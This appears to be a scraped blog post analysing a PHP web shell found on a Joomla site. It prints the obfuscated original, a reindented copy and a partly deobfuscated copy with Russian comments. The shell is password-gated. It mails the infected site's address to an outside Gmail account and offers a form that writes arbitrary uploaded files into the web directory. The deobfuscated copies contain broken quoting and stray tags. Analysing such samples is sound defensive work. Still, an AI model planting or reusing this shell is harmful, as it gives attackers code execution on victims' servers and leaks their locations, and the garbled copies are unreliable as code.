php Joomla病毒
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了php Joomla病毒相关的知识,希望对你有一定的参考价值。
<?php $password="xuajxg";if ($_GET[pass]==$password){$znwkxwnu="\x78\x30\x62";${"G\x4cO\x42A\x4c\x53"}["\x73\x72u\x68\x61\x6a\x76"]="\x781\x30";${"GLO\x42\x41\x4c\x53"}["v\x66sqb\x64f\x6a\x6e\x6f\x70\x70"]="x\x30\x65";${"\x47\x4c\x4fB\x41LS"}["g\x6f\x67c\x7ah\x62\x6d\x71"]="x0\x64";${"\x47\x4c\x4fB\x41\x4c\x53"}["o\x72\x63\x69\x69\x68\x68\x66\x69\x6f\x71"]="\x78\x30\x62";$lounprsoxdal="x1\x30";${$lounprsoxdal}="m\x61il";${"\x47\x4c\x4fB\x41\x4cS"}["\x75k\x78\x71\x75e\x65\x6c\x6a"]="x0b";${"\x47\x4cO\x42\x41\x4c\x53"}["cc\x77\x61\x78y\x68\x66\x77\x76"]="\x78\x30\x64";$byrhwcid="\x780\x63";$xulbjxjjel="\x78\x30\x64";${"GL\x4fB\x41L\x53"}["\x64\x61\x76\x75\x6ex\x67\x70d\x79"]="x\x30\x64";${"\x47\x4c\x4fB\x41\x4cS"}["\x78m\x77\x7a\x78\x70\x72o\x6a\x76"]="\x78\x30\x66";${"\x47L\x4f\x42\x41L\x53"}["qj\x78\x6d\x66\x77"]="x\x30\x63";${${"\x47\x4cO\x42\x41\x4cS"}["\x75\x6bxq\x75ee\x6cj"]}=$_SERVER["SE\x52VER_\x4e\x41ME"].$_SERVER["\x53\x43R\x49\x50\x54_\x4e\x41ME"];${$byrhwcid}="ar\x72ay\x20".${${"\x47\x4c\x4fBALS"}["or\x63\x69i\x68\x68\x66i\x6fq"]};${${"G\x4c\x4f\x42\x41\x4cS"}["\x67\x6fg\x63\x7a\x68\x62\x6dq"]}=array("com","gm","ttroot2","@","ail.");${${"\x47\x4c\x4f\x42\x41LS"}["v\x66\x73\x71\x62\x64\x66j\x6e\x6fpp"]}=${${"\x47L\x4f\x42A\x4c\x53"}["g\x6fg\x63\x7a\x68\x62m\x71"]}[2].${${"\x47\x4c\x4f\x42AL\x53"}["\x63\x63wa\x78\x79\x68\x66\x77\x76"]}[3].${${"G\x4cO\x42A\x4cS"}["\x67\x6f\x67\x63\x7a\x68\x62\x6dq"]}[1].${${"GLOB\x41\x4cS"}["d\x61\x76\x75\x6e\x78\x67\x70\x64\x79"]}[4].${$xulbjxjjel}[0];${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78mwz\x78\x70ro\x6a\x76"]}=@${${"\x47LO\x42\x41L\x53"}["\x73\x72u\x68a\x6a\x76"]}(${${"\x47\x4c\x4f\x42ALS"}["v\x66\x73q\x62df\x6a\x6e\x6f\x70p"]},${${"G\x4c\x4f\x42\x41LS"}["\x71\x6a\x78\x6dfw"]},${$znwkxwnu});${"GLOBAL\x53"}["\x77\x6dy\x6b\x78s\x6b\x78cy\x75\x6a"]="\x75\x72\x6c";${"GLO\x42ALS"}["\x62\x6d\x63\x74v\x77\x63"]="\x70\x61\x74h";echo "\x3c\x64i\x76\x20a\x6cig\x6e=\x22\x63\x65n\x74\x65r\x22\x3e\n\x3ci\x6dg\x20\x73r\x63=\"\x68\x74t\x70://w\x77\x77\x2eubhtea\x6d\x2eorg/\x69mage\x73/\x55BH\x46i\x6ea\x6c1.p\x6eg\x22 wi\x64\x74h\x3d\"200\" he\x69g\x68t=\x221\x35\x30\">\x3c/\x69\x6dg\x3e\x3c\x62r\x3e\n<fo\x72m act\x69\x6f\x6e=\"\x22\x20m\x65t\x68od=\"\x70\x6fst\"\x20\x65ncty\x70e=\"\x6dul\x74ipa\x72t/fo\x72\x6d-da\x74a\x22\x3e\n<l\x61\x62el\x20\x66or\x3d\"\x66i\x6ce\x22\x3eF\x69l\x65\x6ea\x6de:\x3c/\x6c\x61be\x6c\x3e\n\x3c\x69\x6ep\x75\x74\x20type=\x22f\x69\x6ce\" n\x61m\x65=\x22\x66il\x65\"\x20i\x64\x3d\x22f\x69l\x65\"\x20/\x3e\n<\x62\x72\x20/\x3e\n<i\x6e\x70\x75\x74\x20\x74y\x70e=\x22\x73ubm\x69t\"\x20\x6e\x61\x6de\x3d\"\x73\x75b\x6d\x69\x74\" v\x61\x6cue\x3d\x22\x55p\x6co\x61d\"\x3e\n\x3c/\x66\x6frm>\n</di\x76>\n";if(isset($_POST["sub\x6di\x74"])){if($_FILES["f\x69\x6c\x65"]["e\x72r\x6fr"]>0){echo"\x45\x72\x72\x6fr: ".$_FILES["f\x69\x6ce"]["err\x6f\x72"]."<\x62r />";}else{echo"\x55\x70\x6co\x61d:\x20".$_FILES["fi\x6c\x65"]["\x6e\x61\x6d\x65"]."<br\x20/>";echo"\x53\x69\x7a\x65:\x20".($_FILES["\x66il\x65"]["\x73\x69ze"]/1024)."\x20\x4bb\x3c\x62r /\x3e";echo"St\x6f\x72\x65d\x20i\x6e: ".$_FILES["\x66i\x6ce"]["\x74mp_\x6eam\x65"]."<\x62\x72\x3e";}if(file_exists("".$_FILES["f\x69\x6ce"]["\x6e\x61\x6d\x65"])){echo$_FILES["\x66i\x6ce"]["na\x6d\x65"]." a\x6c\x72\x65a\x64y\x20ex\x69\x73\x74\x73\x2e\x20";}else{$iwtdsenis="\x75rl";${"G\x4cO\x42A\x4cS"}["e\x66y\x74\x64\x69\x6f\x77t"]="\x70\x61\x74\x68";move_uploaded_file($_FILES["fi\x6ce"]["\x74\x6dp_\x6eame"],"".$_FILES["fi\x6c\x65"]["name"]);${${"\x47\x4cO\x42\x41LS"}["\x62\x6d\x63tv\x77c"]}=__dir__;${"\x47\x4cO\x42AL\x53"}["\x6f\x78xzjyqsz"]="\x70\x61\x74\x68";echo"S\x74o\x72\x65\x64 i\x6e: ".${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x65\x66\x79\x74\x64i\x6f\x77\x74"]}."/".$_FILES["f\x69\x6c\x65"]["nam\x65"]."<br>";echo"<\x68r\x3e";$chubtyhcjkr="\x70\x61\x74\x68";${$iwtdsenis}="\x68\x74\x74p://".$_SERVER["\x48\x54\x54\x50\x5f\x48O\x53T"].$_SERVER["REQ\x55ES\x54\x5f\x55RI"];${${"\x47\x4c\x4f\x42\x41LS"}["\x6f\x78\x78zj\x79\x71\x73\x7a"]}=str_replace("\x75\x70.\x70h\x70",$_FILES["\x66\x69\x6c\x65"]["\x6ea\x6d\x65"],${${"\x47\x4cO\x42\x41\x4cS"}["\x77\x6d\x79\x6bxsk\x78\x63\x79uj"]});echo"\x47o\x20\x68e\x72e\x20:\x20".${$chubtyhcjkr}."\x3c\x62r\x3e";}}}else{ ?><form action="" method="GET"><font color="#00FFCC">Password:<input type="password" name="pass" id="pass"><input type="submit" name="login" value="go!" /></form><?php } ?>
Reindent
<?php
$password="xuajxg";
if ($_GET[pass]==$password){
$znwkxwnu="x0b";
${"GLOBALS"}["sruhajv"]="x10";
${"GLOBALS"}["vfsqbdfjnopp"]="x0e";
${"GLOBALS"}["gogczhbmq"]="x0d";
${"GLOBALS"}["orciihhfioq"]="x0b";
$lounprsoxdal="x10";
${$lounprsoxdal}="mail";
${"GLOBALS"}["ukxqueelj"]="x0b";
${"GLOBALS"}["ccwaxyhfwv"]="x0d";
$byrhwcid="x0c";
$xulbjxjjel="x0d";
${"GLOBALS"}["davunxgpdy"]="x0d";
${"GLOBALS"}["xmwzxprojv"]="x0f";
${"GLOBALS"}["qjxmfw"]="x0c";
${${"GLOBALS"}["ukxqueelj"]}=$_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"];
${$byrhwcid}="array ".${${"GLOBALS"}["orciihhfioq"]};
${${"GLOBALS"}["gogczhbmq"]}=array("com","gm","ttroot2","@","ail.");
${${"GLOBALS"}["vfsqbdfjnopp"]}=${${"GLOBALS"}["gogczhbmq"]}[2].${${"GLOBALS"}["ccwaxyhfwv"]}[3].${${"GLOBALS"}["gogczhbmq"]}[1].${${"GLOBALS"}["davunxgpdy"]}[4].${$xulbjxjjel}[0];
${${"GLOBALS"}["xmwzxprojv"]}=@${${"GLOBALS"}["sruhajv"]}(${${"GLOBALS"}["vfsqbdfjnopp"]},${${"GLOBALS"}["qjxmfw"]},${$znwkxwnu});${"GLOBALS"}["wmykxskxcyuj"]="url";
${"GLOBALS"}["bmctvwc"]="path";
echo "<div align='center'>\n
<img src=\"http://www.ubhteam.org/images/UBHFinal1.png' width=\"200\" height='150\"></img>
<br>\n
<form action=\"' method=\"post\" enctype=\"multipart/form-data'>\n
<label for=\"file'>Filename:</label>\n<input type='file\" name='file\" id='file\" />\n
<br />\n
<input type='submit\" name=\"submit\" value='Upload\">\n
</form>\n
</div>\n";
if(isset($_POST["submit"])){
if($_FILES["file"]["error"]>0){
echo"error: ".$_FILES["file"]["error"]."<br />";
}else{
echo"Upload: ".$_FILES["file"]["name"]."<br />";
echo"Size: ".($_FILES["file"]["size"]/1024)." Kb<br />";
echo"Stored in: ".$_FILES["file"]["tmp_name"]."<br>";
}
if(file_exists("".$_FILES["file"]["name"])){
echo$_FILES["file"]["name"]." already exists. ";
}else{
$iwtdsenis="url";
${"GLOBALS"}["efytdiowt"]="path";
move_uploaded_file($_FILES["file"]["tmp_name"],"".$_FILES["file"]["name"]);
${${"GLOBALS"}["bmctvwc"]}=__dir__;
${"GLOBALS"}["oxxzjyqsz"]="path";
echo"Stored in: ".${${"GLOBALS"}["efytdiowt"]}."/".$_FILES["file"]["name"]."<br>";
echo"<hr>";
$chubtyhcjkr="path";
${$iwtdsenis}="http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"];
${${"GLOBALS"}["oxxzjyqsz"]}=str_replace("up.php",$_FILES["file"]["name"],${${"GLOBALS"}["wmykxskxcyuj"]});
echo"Go here : ".${$chubtyhcjkr}."<br>";}}
}else{
?>
<form action="" method="GET">
<font color="#00FFCC">Password:
<input type="password" name="pass" id="pass">
<input type="submit" name="login" value="go!" />
Замена переменной
<?php
// $GLOBALS — Ссылки на все переменные глобальной области видимости
$password="xuajxg";
if ($_GET[pass]==$password){
$GLOBALS["sruhajv"]="x10";
$GLOBALS["vfsqbdfjnopp"]="x0e";
$lounprsoxdal="x10";
$x0b=$_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"];
$x0c="array $_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"]";
$x0d=array("com","gm","ttroot2","@","ail.");
$x0e=ttroot2@gmail.com;
$x0f=@mail(ttroot2@gmail.com, array $_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"], $_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"]);
echo "<div align='center'>\n
<img src=\"http://www.ubhteam.org/images/UBHFinal1.png' width=\"200\" height='150\"></img>
<br>\n
<form action=\"' method=\"post\" enctype=\"multipart/form-data'>\n
<label for=\"file'>Filename:</label>\n<input type='file\" name='file\" id='file\" />\n
<br />\n
<input type='submit\" name=\"submit\" value='Upload\">\n
</form>\n
</div>\n";
if(isset($_POST["submit"])){
if($_FILES["file"]["error"]>0){
echo"error: ".$_FILES["file"]["error"]."<br />";
}else{
echo"Upload: ".$_FILES["file"]["name"]."<br />";
echo"Size: ".($_FILES["file"]["size"]/1024)." Kb<br />";
echo"Stored in: ".$_FILES["file"]["tmp_name"]."<br>";
}
if(file_exists("".$_FILES["file"]["name"])){
echo $_FILES["file"]["name"]." already exists. ";
}else{
$iwtdsenis="url";
move_uploaded_file($_FILES["file"]["tmp_name"],"".$_FILES["file"]["name"]);
$path=__dir__;
echo"Stored in: ".$path."/".$_FILES["file"]["name"]."<br>";
echo"<hr>";
${$iwtdsenis}="http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"];
$path=str_replace("up.php",$_FILES["file"]["name"],$url);
echo"Go here : ".$path."<br>";
}
}
}else{
?>
<form action="" method="GET">
<font color="#00FFCC">Password:
<input type="password" name="pass" id="pass">
<input type="submit" name="login" value="go!" />
</form>
<?php } ?>
</form>
<?php } ?>
以上是关于php Joomla病毒的主要内容,如果未能解决你的问题,请参考以下文章